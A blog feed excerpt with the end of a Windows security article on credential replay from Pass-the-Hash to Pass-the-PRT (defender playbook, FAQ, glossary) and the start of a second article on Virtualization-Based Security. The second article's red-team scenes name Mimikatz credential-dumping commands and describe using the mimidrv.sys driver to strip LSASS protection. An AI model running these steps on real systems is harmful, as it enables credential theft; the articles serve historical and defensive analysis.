    A2 --&amp;gt; A3
    A3 --&amp;gt; A4
    A4 --&amp;gt; A5
    A4 --&amp;gt; A6
    A6 --&amp;gt; A7
    D1 --&amp;gt; D2
    D2 --&amp;gt; D3
    D3 --&amp;gt; D4
    D4 --&amp;gt; D5
    D5 -.- D6
    A2 -.- D1
    A2 -.- D2
    A3 -.- D3
    A4 -.- D3
    A5 -.- D4
    A6 -.- D5
    A7 -.- D6
&lt;p&gt;If the pattern holds, Generation 6 is already in research literature. Mollema&apos;s 2023-2025 continuation work [@mollema-prt-phishing] [@mollema-federated-credentials] [@mollema-actor-tokens] documents the device-transport-key extraction primitives. The only things missing are the name and the commodity tool. The historical pattern says we probably get both before VBS-class CloudAP isolation ships.&lt;/p&gt;
&lt;h2&gt;10. Open Problems and the 2026-2030 Forecast&lt;/h2&gt;
&lt;p&gt;The credential-replay family has six load-bearing open problems in 2026. Each is structural rather than mathematical; the cryptographic primitives that would close them already exist.&lt;/p&gt;
&lt;p&gt;The architectural lower bound -- the only configuration that closes the family in principle -- is the union of three things.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Universal hardware-rooted non-extractable keys&lt;/strong&gt;: every long-term authentication artefact lives in a TPM, secure enclave, FIDO2 authenticator, or smart card, with key attestation, and is never released to software memory. &lt;strong&gt;Universal protocol-layer token binding&lt;/strong&gt;: every issued token (Kerberos service ticket, OAuth refresh token, OIDC ID token, SAML assertion) is cryptographically bound to the device that requested it, and a verifier rejects any presentation from a non-bound device. &lt;strong&gt;Universal continuous evaluation&lt;/strong&gt;: every protected resource queries the issuer in near-real-time and revokes within minutes of a triggering signal. Each component is deployed &lt;em&gt;somewhere&lt;/em&gt;; none is deployed &lt;em&gt;everywhere&lt;/em&gt;; no single vendor controls all three layers.&lt;/p&gt;
&lt;p&gt;The five concrete open problems flow from the lower bound.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The CloudAP isolation problem.&lt;/strong&gt; When does Microsoft extend VBS-class isolation to the CloudAP plug-in&apos;s working memory in LSASS? No public roadmap as of 2026. Until it ships, Pass-the-PRT remains operationally open against every Entra-joined Windows endpoint.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The token-binding adoption problem.&lt;/strong&gt; Token Protection&apos;s verbatim 2026 scope is the five named resources enumerated in section 8 [@ms-entra-token-protection], which covers approximately five percent of typical Entra-integrated SaaS surface area; every other Entra-integrated resource accepts unbound tokens. The OAuth working group&apos;s RFC 9449 (DPoP, September 2023) standardises proof-of-possession at the OAuth layer [@rfc-9449], but adoption across SaaS providers and enterprise applications is uneven.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The Pass-the-DeviceKey forecast.&lt;/strong&gt; Mollema&apos;s 2023-2025 continuation work exercises device-transport-key extraction primitives, federated-credential persistence on Entra applications, and cross-tenant Actor-token abuse [@mollema-prt-phishing] [@mollema-federated-credentials] [@mollema-actor-tokens]. The pattern of every previous generation predicts that whichever of these primitives commoditises first will be the next named &quot;Pass-the-X&quot; technique.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The ESC9-ESC16 hardening problem.&lt;/strong&gt; The AD CS catalog has grown from 8 entries (June 2021) to 16 (current Certipy and Certify wikis [@certipy-wiki-privesc] [@specterops-certify-wiki]); most additions are misconfiguration-class rather than CVE-class. ESC9 specifically describes the &lt;code&gt;CT_FLAG_NO_SECURITY_EXTENSION&lt;/code&gt; template flag that &lt;em&gt;exempts&lt;/em&gt; a template from the very SID extension KB5014754 introduced -- so administrators who turn that flag on for legacy compatibility reasons silently re-enable the Certifried-class abuse path on those templates.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Hardware-backed identity ubiquity.&lt;/strong&gt; When does the union of Pluton + FIDO2 + virtual smart cards + TPM key attestation eliminate the long-term software-extractable artefact class? Human interactive sign-in to Entra ID can already be fully passwordless on supported hardware. The long tail of service accounts, scheduled tasks, on-prem AD workflows, and legacy applications resists migration; the migration is a years-long enterprise project, not a feature flag.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The non-Microsoft sibling lineages.&lt;/strong&gt; The credential-replay family is not Windows-specific. Okta session-cookie theft, Google IDP refresh-token reuse, Apple ASWebAuthSession token replay, and AWS STS session-token theft all face the same architectural property. An enterprise running Microsoft plus Okta plus Google inherits the union of every vendor&apos;s residual replay surface. The family generalises beyond Microsoft because the architectural property generalises beyond Microsoft.&lt;/p&gt;

Okta&apos;s `sessionToken` and OAuth `refresh_token` artefacts live on the device that requested them, and have been used in commodity offensive tooling since at least 2022. Google&apos;s IDP refresh tokens face the same exposure surface on managed Chromebooks. Apple&apos;s ASWebAuthSession tokens are device-bound at the platform level, which closes the cross-device replay case but not the same-device extraction case. AWS STS session tokens are not device-bound at all. The credential-replay family is a property of long-term software-extractable authentication artefacts in general; this article is Windows-specific only because Windows has the longest documented lineage.
&lt;p&gt;The institutional position is that the protocol-level fix is unavailable -- Microsoft&apos;s framing of Pass-the-Hash as a structural property of NTLM generalises directly to every later generation. A universal fix would require replacing every long-term software-extractable artefact globally with hardware-bound primitives, with mandatory token binding at every issuer and every resource server, with continuous evaluation everywhere. Each step is incrementally closable; the union has not yet closed for any deployment.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Universal hardware-rooted non-extractable keys, universal protocol-layer token binding, universal continuous evaluation. Each component is deployed somewhere; none is deployed everywhere. No single vendor controls all three layers.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The architectural property the family shares has held for twenty-nine years; the defensive lineage will not close it without making &lt;em&gt;every&lt;/em&gt; long-term artefact live in hardware-rooted isolation that exceeds the host&apos;s privilege. Whether that happens in the next five years, the next ten, or the next twenty-five, is the open question the next chapter of this lineage will answer.&lt;/p&gt;
&lt;h2&gt;11. The 2026 Defender Playbook&lt;/h2&gt;
&lt;p&gt;Architectural humility does not mean defensive passivity. The 2026 estate is defensible against generations 1 through 3 and partially against generation 4; the playbook is to deploy every available control while reading Mollema&apos;s 2025 posts to know what&apos;s coming for generation 5 and beyond.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Credential Guard everywhere it can run.&lt;/strong&gt; Hardware-eligible non-DC Windows 10/11 endpoints, with the four-residual disclosure (AD database, DCs, certificate keys, CloudAP) documented for the SOC so that detection engineering does not assume Credential Guard covers categories it explicitly excludes [@ms-learn-credential-guard].&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;LSA Protection (RunAsPPL), UEFI-anchored&lt;/strong&gt; stacked underneath, per itm4n&apos;s &quot;complementary&quot; framing [@itm4n-lsass-runasppl]. The UEFI-anchored variant resists the registry-based bypass that a kernel-mode attacker can otherwise apply at boot.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Authentication Silos and Protected Users for Tier-0 accounts.&lt;/strong&gt; Expect to encounter unconstrained-delegation breakage on legacy services and budget remediation; the 240-minute TGT cap is the lever that prevents long-lived Tier-0 ticket reuse [@ms-protected-users].&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;KB5014754 strong-mapping enforcement&lt;/strong&gt; -- fully on by the September 9, 2025 cutover -- plus an annual certificate-template audit cycle against the ESC1-ESC16 catalog using Certipy or PSPKIAudit [@ms-kb5014754] [@certipy-wiki-privesc]. The audit is the load-bearing control because the strong-mapping fix only closes Certifried-class abuses; the template misconfigurations Schroeder and Christensen catalogued are still administrative responsibility.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Conditional Access with Token Protection where supported&lt;/strong&gt; -- the five resources Microsoft Learn enumerates [@ms-entra-token-protection]. Device-bound sign-ins for privileged accounts; FIDO2 for human interactive sign-in. Know that the long tail of Entra-integrated SaaS does not enforce binding, and that a stolen PRT used against an unbound resource will still authenticate.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;PRT-extraction telemetry.&lt;/strong&gt; Detect CloudAP-plug-in token access from non-CloudAP processes; tie to Endpoint DLP; alert on out-of-band access to &lt;code&gt;cloudap.dll&lt;/code&gt;-owned regions of LSASS memory. Mollema&apos;s &lt;code&gt;roadtx&lt;/code&gt; and BARK produce signal patterns worth modelling.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Mental model: assume the PRT is the next NT hash.&lt;/strong&gt; Architect today as if Credential Guard for CloudAP shipped tomorrow -- which means TPM-attested device joins as standard, FIDO2 for every human sign-in, hardware-backed identity for service accounts wherever the vendor supports it, and conditional access policies that treat unmanaged or non-attested devices as untrusted by default.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;

Open PowerShell as administrator and run:&lt;p&gt;&lt;code&gt;Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard | Format-List&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The result of interest is &lt;code&gt;SecurityServicesRunning&lt;/code&gt;. A value of &lt;code&gt;1&lt;/code&gt; in that list means Credential Guard is actively running (per the Win32_DeviceGuard documentation: &lt;code&gt;1 = Credential Guard&lt;/code&gt;, &lt;code&gt;2 = HVCI&lt;/code&gt;, &lt;code&gt;3 = System Guard secure launch&lt;/code&gt;, etc.). &lt;code&gt;SecurityServicesConfigured&lt;/code&gt; tells you what the policy intends; &lt;code&gt;SecurityServicesRunning&lt;/code&gt; tells you what the hypervisor is actually enforcing right now. The two values disagree more often than you would expect, usually because the hardware did not meet a prerequisite at boot.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The minimum-viable layer: Credential Guard on every hardware-eligible non-DC endpoint, KB5014754 enforcement-mode certificate strong mapping with an annual ESC catalog audit, and PRT-extraction telemetry tied to a real detection workflow. The first two are commodity Microsoft features that close real attack classes today; the third is the only meaningful signal you can get on the attack class that none of the published defenses currently closes.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;None of this closes Pass-the-PRT. All of it shortens the dwell time.&lt;/p&gt;
&lt;h2&gt;12. Frequently Asked Questions&lt;/h2&gt;


No. The Primary Refresh Token sits in the CloudAP plug-in, which is outside Credential Guard&apos;s verbatim three-credential scope -- see section 6 (&quot;What does Credential Guard isolate?&quot;) and section 8 (&quot;Pass-the-PRT defeats three Microsoft defenses simultaneously&quot;) for the full mechanism.

No. The 1997 Ashton patch and the 2008 Ochoa Windows-native pivot are both pre-Mimikatz; see section 1 and section 3 for the full origin story. Mimikatz is the dominant *tool* (May 2011 first release) but it is not the *origin* of Pass-the-Hash.

No. The PRT is *hybrid* -- issued and revoked cloud-side by Entra ID, but stored and used client-side via the CloudAP plug-in inside LSASS. See section 8 (&quot;Where the PRT *lives*&quot;) for why this hybrid architecture is what makes Pass-the-PRT operationally tractable today.

No. It closed the three Certifried-class CVEs (CVE-2022-26923, CVE-2022-26931, CVE-2022-34691) but not the broader ESC2 through ESC16 catalog. See section 7 (&quot;What does KB5014754 actually close?&quot;) and Table 1 for the per-template breakdown.

For human interactive sign-in to Entra ID, mostly, if the entire enterprise migrates -- the FIDO2 authenticator holds a non-extractable private key in hardware, and the resulting authentication is bound to that key. For service accounts, scheduled tasks, on-prem Kerberos workflows, hybrid identity scenarios, and the long tail of legacy applications, no -- those paths still rely on long-term software-extractable artefacts (passwords, hashes, keys) by construction. The architectural counter is universal hardware-rooted non-extractable keys plus universal token binding plus universal continuous evaluation; the operational reality is partial coverage.

No public v3. See section 5 (&quot;The Mitigating-PtH v3 that never shipped&quot;) for the source-by-source disambiguation against Microsoft Download Center ID 36036.

&lt;h2&gt;13. The Pattern That Outlived Six Defenses&lt;/h2&gt;
&lt;p&gt;The 1997 patch and the 2026 attack are the same attack because the architectural property the family shares is unchanged. The artefact moved; the property did not.&lt;/p&gt;
&lt;p&gt;A long-term authentication artefact reachable by the using process is replayable. The NT hash sat in LSASS on Windows NT 4.0 and replayed against SMB. The Kerberos TGT sat in LSASS on Windows Server 2003 and replayed against Kerberos services. The NT hash sat in LSASS on Windows Server 2008 and replayed against the KDC&apos;s RC4-HMAC authentication path as a real Kerberos client.&lt;/p&gt;
&lt;p&gt;The X.509 certificate private key sat in a CryptoAPI key container on Windows Server 2012 R2 and replayed against PKINIT-supporting domain controllers as the principal in the SAN. The Primary Refresh Token sits in the CloudAP plug-in inside LSASS on Windows 11 23H2 today, and replays against Entra ID as the device&apos;s user from any machine that holds the extracted session key.&lt;/p&gt;
&lt;p&gt;Each defense relocated the artefact to a harder-to-reach storage class. The &quot;Do not store LAN Manager hash&quot; policy retired LM. RunAsPPL marked LSASS as a Protected Process Light. Credential Guard moved NT hashes and TGT session keys out of LSASS in VTL0 into the LSAISO trustlet in VTL1. KB5014754 bound certificates to SIDs at issuance, so that a certificate without the SID extension fails strong mapping at the KDC. Token Protection bound PRTs to devices, so that a stolen PRT used against a supported resource from a non-bound device fails.&lt;/p&gt;
&lt;p&gt;Each defense was real. Each closed a generation. The family did not close.&lt;/p&gt;
&lt;p&gt;The reason the family does not close is structural. Every generation finds the next long-term artefact whose storage class the latest defense did not isolate. Pass-the-Hash worked because the NT hash was reachable. Pass-the-Ticket worked because the TGT was reachable. Overpass-the-Hash worked because the NT hash was reachable &lt;em&gt;and&lt;/em&gt; the KDC accepted RC4-HMAC. Pass-the-Certificate worked because certificate templates were misconfigured and the SID extension did not exist. Pass-the-PRT works because CloudAP is in LSASS in VTL0 and Token Protection covers five resources.&lt;/p&gt;
&lt;p&gt;The architectural lower bound -- universal hardware-rooted non-extractable keys plus universal token binding plus universal continuous evaluation -- is the only configuration that closes the family, and it is not deployed anywhere as a complete stack.&lt;/p&gt;
&lt;p&gt;The playbook in the previous section is what to do today. The forecast in section 10 is what to architect for next. The closing observation is the one this article exists to register: when you read about the next named &quot;Pass-the-X&quot; technique, you already know what it will look like. A long-term authentication artefact, reachable from the process that holds it, replayed from a different machine, defeating the latest defense because that defense was designed for a different artefact.&lt;/p&gt;
&lt;p&gt;Generation 6 is already in research literature. The only thing missing is the name.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;pass-the-hash-to-pass-the-prt&quot; keyTerms={[
  { term: &quot;NT hash&quot;, definition: &quot;16-byte MD4 of the user&apos;s password as UTF-16 little-endian; the long-term Windows authentication secret since the early NT releases, unsalted by design.&quot; },
  { term: &quot;NTLM challenge-response&quot;, definition: &quot;Family of Windows authentication protocols (NTLMv1 and NTLMv2) in which the server sends a random challenge and the client returns a keyed cryptographic response computed under a key derived from the user&apos;s password; the password is never transmitted.&quot; },
  { term: &quot;Pass-the-Hash&quot;, definition: &quot;Authenticating with a stolen NT hash by feeding it directly to the protocol&apos;s response-construction function instead of typing a password; Paul Ashton, NTBugtraq, April 1997.&quot; },
  { term: &quot;LSASS&quot;, definition: &quot;Local Security Authority Subsystem Service; the user-mode Windows process that caches in-memory credential material (hashes, tickets, certificate handles, PRT material) for the duration of each logon session.&quot; },
  { term: &quot;Kerberos TGT&quot;, definition: &quot;Ticket Granting Ticket: the long-lived Kerberos credential issued by the KDC&apos;s Authentication Service, encrypted under the krbtgt long-term key, carrying a session key for subsequent service-ticket requests.&quot; },
  { term: &quot;Pass-the-Ticket&quot;, definition: &quot;Extracting a Kerberos TGT (and its session key) from one machine&apos;s LSASS-resident Kerberos cache and injecting it into another machine&apos;s cache.&quot; },
  { term: &quot;Overpass-the-Hash&quot;, definition: &quot;Presenting a stolen NT hash to the KDC as the user&apos;s long-term RC4-HMAC Kerberos key (per RFC 4757) to obtain a real TGT signed by the real krbtgt.&quot; },
  { term: &quot;Credential Guard&quot;, definition: &quot;Windows feature that relocates NT hashes, Kerberos TGT session keys, and &apos;credentials stored by applications as domain credentials&apos; from LSASS in VTL0 to the LSAISO trustlet in VTL1, isolated by the Windows hypervisor.&quot; },
  { term: &quot;LSAISO trustlet&quot;, definition: &quot;The isolated-user-mode LSA process (lsaiso.exe) that holds Credential Guard&apos;s protected credential material in VTL1; unreadable from any VTL0 process or driver.&quot; },
  { term: &quot;PKINIT&quot;, definition: &quot;Kerberos pre-authentication using a certificate&apos;s private key in place of a long-term symmetric key (RFC 4556); the SAN of the certificate maps to the principal whose TGT the KDC will issue.&quot; },
  { term: &quot;Pass-the-Certificate&quot;, definition: &quot;Authenticating to Active Directory with a stolen X.509 certificate&apos;s private key via PKINIT to the KDC or Schannel client-cert authentication to LDAPS.&quot; },
  { term: &quot;szOID_NTDS_CA_SECURITY_EXT&quot;, definition: &quot;X.509 extension introduced by KB5014754 (OID 1.3.6.1.4.1.311.25.2) that carries the requesting principal&apos;s SID at certificate issuance; the basis of KDC strong certificate mapping.&quot; },
  { term: &quot;Primary Refresh Token (PRT)&quot;, definition: &quot;Microsoft Entra-issued long-lived refresh token for SSO on Entra-joined or Hybrid-joined Windows devices; carries a session key (HMAC-SHA256) and binds to a device transport key; default 90-day lifetime with sliding renewal.&quot; },
  { term: &quot;CloudAP&quot;, definition: &quot;Cloud Authentication Provider; the Windows authentication package (cloudap.dll) loaded into LSASS that holds Microsoft Entra credential material including the PRT; not currently inside Credential Guard&apos;s isolation scope.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>active-directory</category><category>kerberos</category><category>credential-theft</category><category>credential-guard</category><category>entra-id</category><category>pass-the-hash</category><category>pass-the-prt</category><category>windows-security</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Above the Kernel: The Windows Security Wars Part 4 (2015-2019)</title><link>https://paragmali.com/blog/above-the-kernel-the-windows-security-wars-part-4-2015-2019/</link><guid isPermaLink="true">https://paragmali.com/blog/above-the-kernel-the-windows-security-wars-part-4-2015-2019/</guid><description>Windows 10 ships Virtualization-Based Security and finally puts the credential store above the kernel -- in the same five years that ransomware became a billion-dollar industry.</description><pubDate>Wed, 27 May 2026 00:00:00 GMT</pubDate><content:encoded>
Between July 2015 and December 2019, Windows shipped its largest structural security discontinuity since the NT design itself: Virtualization-Based Security (VBS), which moves the credential store and the kernel code-integrity policy into a Secure Kernel running at a privilege level the NT kernel cannot reach. In the same five-year window, ransomware industrialized from spray-and-pray to double extortion -- WannaCry, NotPetya, Ryuk, REvil, Maze -- and a third axis, Meltdown / Spectre, proved the CPU itself could be the attacker&apos;s primitive. The paradox of simultaneity is the whole story: a kernel-isolated 2017 Enterprise laptop and a paralyzed NHS trust both ran &quot;Windows&quot; that May 12, and the difference between them was not architecture but operations -- a missing patch on a network nobody had segmented.
&lt;h2&gt;1. Two Scenes, One Five-Year Window&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Scene A.&lt;/strong&gt; A red-team operator, sometime in late 2016, sits in front of a freshly-imaged Windows 10 1607 Enterprise laptop with Credential Guard enabled. They open an elevated PowerShell, drop &lt;code&gt;mimikatz.exe&lt;/code&gt; to disk, launch it, type &lt;code&gt;privilege::debug&lt;/code&gt;. The prompt returns &lt;code&gt;&apos;20&apos; OK&lt;/code&gt;. They type &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt;. Output scrolls. The &lt;code&gt;NTLM&lt;/code&gt; and &lt;code&gt;Kerberos&lt;/code&gt; fields, where the cached hash and the Ticket Granting Ticket would normally appear, are empty. Not denied. Not access-restricted. Empty. The local LSASS process still exists; it still answers requests; the API surface is intact. But the secrets the operator came to read no longer live in this kernel.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Scene B.&lt;/strong&gt; 11:00 a.m. UTC, May 12, 2017. The Royal London Hospital&apos;s radiology department. A workstation displays a red ransom note in eight languages. By 4:00 p.m., the National Audit Office will later determine, the attack has disrupted at least 34 percent of NHS trusts in England; some 19,000 patient appointments will be cancelled; ambulances will divert; junior doctors will hand-write prescriptions on paper [@nao-wannacry]. The exploit that delivered the worm to that machine, CVE-2017-0144, is one of the SMBv1 remote code execution flaws patched in Microsoft Security Bulletin MS17-010 [@ms-ms17-010] [@nvd-cve-2017-0144]. The patch shipped on March 14, 2017. It is, on May 12, one month and twenty-eight days old [@ms-ms17-010].&lt;/p&gt;
&lt;p&gt;Both scenes happened. Both Windows boxes ran versions of the same operating system released in the same five-year window. Neither scene is hyperbole.&lt;/p&gt;
&lt;p&gt;How can both be true at once? And what does the answer teach us about architectural defense -- its limits and its genuine accomplishments?&lt;/p&gt;
&lt;h2&gt;2. The Same-Privilege Paradox (1993-2014)&lt;/h2&gt;
&lt;p&gt;Here is a sentence to carry through the rest of this article: &lt;strong&gt;a defense that lives at the same privilege level as the attacker can always be turned off.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;That sentence is the lesson of every Windows defense built between NT 3.51 in 1993 and Windows 8.1 in 2013. It is also the reason VBS had to exist at all.&lt;/p&gt;
&lt;p&gt;Consider the pattern. The NT security model rests on access tokens and privileges. The privilege named &lt;code&gt;SeDebugPrivilege&lt;/code&gt; lets a holder open any other process and read its memory. Local administrators get it by default; Mimikatz, released by Benjamin Delpy in May 2011, weaponized it [@wired-mimikatz]. Once an attacker reached local SYSTEM, &lt;code&gt;SeDebugPrivilege&lt;/code&gt; let them walk into the Local Security Authority Subsystem Service (LSASS) and lift NTLM hashes and Kerberos tickets verbatim. The privilege check was working exactly as designed; the design assumed that whoever had the privilege deserved the data.&lt;/p&gt;
&lt;p&gt;In 2005, with x64 versions of Windows Server 2003 SP1 and Windows XP, Microsoft introduced Kernel Patch Protection -- PatchGuard -- alongside Kernel-Mode Code Signing [@ms-patchguard]. PatchGuard&apos;s job was to detect modifications to critical kernel structures (the SSDT, the IDT, the GDT) and bugcheck the machine if it saw tampering. It was a watchdog inside the kernel watching the kernel.&lt;/p&gt;
&lt;p&gt;By 2007, the indie research journal &lt;code&gt;Uninformed&lt;/code&gt; published Skywing&apos;s third installment in a public series demonstrating how a kernel-mode attacker could disarm PatchGuard by rewriting its own code paths in-place [@skywing-patchguard]. The bypass was not a clever exploit; it was an inevitability. A monitor running in ring 0 has no privilege the rootkit lacks.&lt;/p&gt;
&lt;p&gt;Driver Signing Enforcement followed the same logic and met the same fate [@ms-patchguard] [@skywing-patchguard]. So did Authenticode, AppLocker, and every other gate placed at the attacker&apos;s reachable privilege level. James Forshaw&apos;s August 2016 Project Zero work on AppContainer escape via shadow object directories rounded out the pattern: even the lowest-privilege sandboxes on Windows could be punctured by symbolic-link redirection executed at the sandbox&apos;s own privilege level [@pz-forshaw-shadow].&lt;/p&gt;
&lt;p&gt;By 2012, three independent vectors had converged on the same insight. Bromium, co-founded by Xen architect Ian Pratt, shipped vSentry: a Type-1 micro-hypervisor that wrapped every risky task -- a browser tab, an opened document, an email attachment -- in its own micro-VM running underneath the Windows kernel [@wiki-bromium] [@silicon-bromium]. Microsoft&apos;s own massive investment in Hyper-V for Server 2012 had matured the company&apos;s hypervisor codebase. Intel&apos;s broad consumer-silicon rollout of Extended Page Tables and Second-Level Address Translation made hardware-assisted virtualization the default rather than the exception.&lt;/p&gt;

The structural observation that any defensive mechanism running at the same CPU privilege level as the attacker can be disabled by the attacker. Gates at ring 3 fall to ring 3 code; gates at ring 0 fall to ring 0 code. The only structural escape is to relocate the defender to a privilege level the attacker cannot reach.

gantt
    title Windows defenses 1993-2014 and what disarmed each one
    dateFormat YYYY
    axisFormat %Y
    section Ring 3 gates
    SeDebugPrivilege (NT 1993)     :done, sedebug, 1993, 2011
    Mimikatz weaponization         :crit, mimi, 2011, 2012
    AppContainer (Win 8 2012)      :done, appc, 2012, 2016
    Symbolic link bypass (Forshaw) :crit, fshaw, 2016, 2017
    LSA Protection (RunAsPPL)      :done, ppl, 2013, 2015
    mimidrv.sys PPL bit removal    :crit, mimidrv, 2015, 2016
    section Ring 0 gates
    PatchGuard (Server 2003 SP1)   :done, pg, 2005, 2007
    Skywing PatchGuard bypass      :crit, sky, 2007, 2008
    Driver Signing Enforcement     :done, dse, 2007, 2012
&lt;p&gt;The shared pattern in those tracks is not a series of individual failures. It is one structural failure repeated. Each &quot;broken&quot; line is a same-privilege primitive arriving on schedule and turning off the gate above it.&lt;/p&gt;
&lt;p&gt;If every same-privilege defense fails the same way, what does a defense that does not live at the same privilege level look like?&lt;/p&gt;
&lt;h2&gt;3. Why Every Pre-VBS Credential Fix Failed&lt;/h2&gt;
&lt;p&gt;Picture a penetration tester in early 2015 working on a Windows 8.1 Pro host. The customer has done its homework. LSA Protection is enabled per Microsoft&apos;s guidance: the registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL&lt;/code&gt; is set to &lt;code&gt;1&lt;/code&gt;, so the operating system launches &lt;code&gt;lsass.exe&lt;/code&gt; as a &lt;a href=&quot;https://paragmali.com/blog/protected-process-light-when-the-administrator-isnt-enough/&quot; rel=&quot;noopener&quot;&gt;Protected Process Light&lt;/a&gt; [@ms-lsa-protection]. The tester opens Mimikatz, types &lt;code&gt;privilege::debug&lt;/code&gt;, gets &lt;code&gt;OK&lt;/code&gt;, and runs &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt;. Access denied. The user-mode &lt;code&gt;OpenProcess&lt;/code&gt; call against a PPL target fails for any non-PPL caller, regardless of how much administrator the caller has.&lt;/p&gt;
&lt;p&gt;That looks like a win for the defender. It is not.&lt;/p&gt;
&lt;p&gt;The tester drops to disk the signed Mimikatz driver, &lt;code&gt;mimidrv.sys&lt;/code&gt;. They load it with a single &lt;code&gt;sc create / sc start&lt;/code&gt; pair. From kernel mode, the driver locates the &lt;code&gt;EPROCESS&lt;/code&gt; structure for LSASS and clears the &lt;code&gt;Protection&lt;/code&gt; bits in the &lt;code&gt;_PS_PROTECTION&lt;/code&gt; field. From the same elevated PowerShell, the tester re-runs &lt;code&gt;sekurlsa::logonpasswords&lt;/code&gt;. The hashes scroll past.&lt;/p&gt;
&lt;p&gt;The PPL bit was a gate. The gate was at the same ring as the lever that opened the gate. The lever was a signed kernel driver shipped by the same project that shipped the dumper.&lt;/p&gt;
&lt;p&gt;itm4n, who maintains the most-cited reference write-up on RunAsPPL behavior, puts the point in one sentence: &quot;Credential Guard and LSA Protection are actually complementary&quot; [@itm4n-runasppl]. They are complementary because they live at different privilege boundaries. PPL is a same-privilege gate inside VTL0. Credential Guard, as we will see in Section 5, is something structurally different.&lt;/p&gt;

&quot;Credential Guard and LSA Protection are actually complementary.&quot; -- itm4n, &quot;Do You Really Know About LSA Protection (RunAsPPL)?&quot;
&lt;p&gt;Microsoft did not stop at PPL. Between 2013 and 2014 the company shipped three credential-theft mitigations, each genuinely useful, none structurally sufficient.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Defense (year)&lt;/th&gt;
&lt;th&gt;What it stops&lt;/th&gt;
&lt;th&gt;What still works&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Restricted Admin RDP (KB2871997, April 2014)&lt;/td&gt;
&lt;td&gt;RDP no longer pushes plaintext or NTLM credentials to the destination machine&lt;/td&gt;
&lt;td&gt;Lateral movement via pass-the-hash from a locally-captured hash; any local credential extraction on the source machine&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Protected Users security group (Server 2012 R2, Oct 2013)&lt;/td&gt;
&lt;td&gt;Disables NTLM and CredSSP credential delegation for member accounts; pre-Windows 8.1 cached creds purged&lt;/td&gt;
&lt;td&gt;Plaintext credential capture during interactive sign-in; non-member accounts; pass-the-ticket once a TGT is obtained&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LSA Protection / RunAsPPL (Win 8.1, Oct 2013) [@ms-lsa-protection]&lt;/td&gt;
&lt;td&gt;User-mode &lt;code&gt;OpenProcess&lt;/code&gt; against &lt;code&gt;lsass.exe&lt;/code&gt; for non-PPL callers fails; conventional Mimikatz from user-land is blocked&lt;/td&gt;
&lt;td&gt;A kernel-mode primitive (&lt;code&gt;mimidrv.sys&lt;/code&gt;, BYOVD, or a vulnerable signed driver) clears the PPL bits from &lt;code&gt;_PS_PROTECTION&lt;/code&gt; and the dump proceeds&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Read the right-hand column as a single sentence. &lt;em&gt;Every defense in the left column was bypassed by the same class of move: the attacker reached a privilege at or above the privilege of the gate, and then the gate opened.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;That is not a flaw in any one of these features. That is the same-privilege paradox arriving in three different costumes.&lt;/p&gt;
&lt;p&gt;itm4n&apos;s full write-up is worth reading end-to-end if you defend Windows endpoints. The author&apos;s &lt;code&gt;PPLdump&lt;/code&gt; proof-of-concept builds the BYOVD-against-PPL attack as a single tool, and the post is unambiguous that PPL is a &quot;same-privilege gate&quot; while Credential Guard is a &quot;cross-privilege isolation&quot; -- the exact distinction this section turns on.&lt;/p&gt;
&lt;p&gt;The reader who has watched a working defender press-release call any of these features &quot;the answer to Mimikatz&quot; will recognize the move by now. Every fix between 2013 and 2014 was at the attacker&apos;s privilege level. Every fix between 2013 and 2014 fell to a primitive at that privilege level. The pattern is not implementation bug. The pattern is structure.&lt;/p&gt;
&lt;p&gt;If incremental fixes at the attacker&apos;s privilege level cannot work, what does a structural fix look like?&lt;/p&gt;
&lt;h2&gt;4. Three Generations Toward Cross-Privilege Isolation&lt;/h2&gt;
&lt;p&gt;The structural answer arrived in three generations, only one of which worked.&lt;/p&gt;
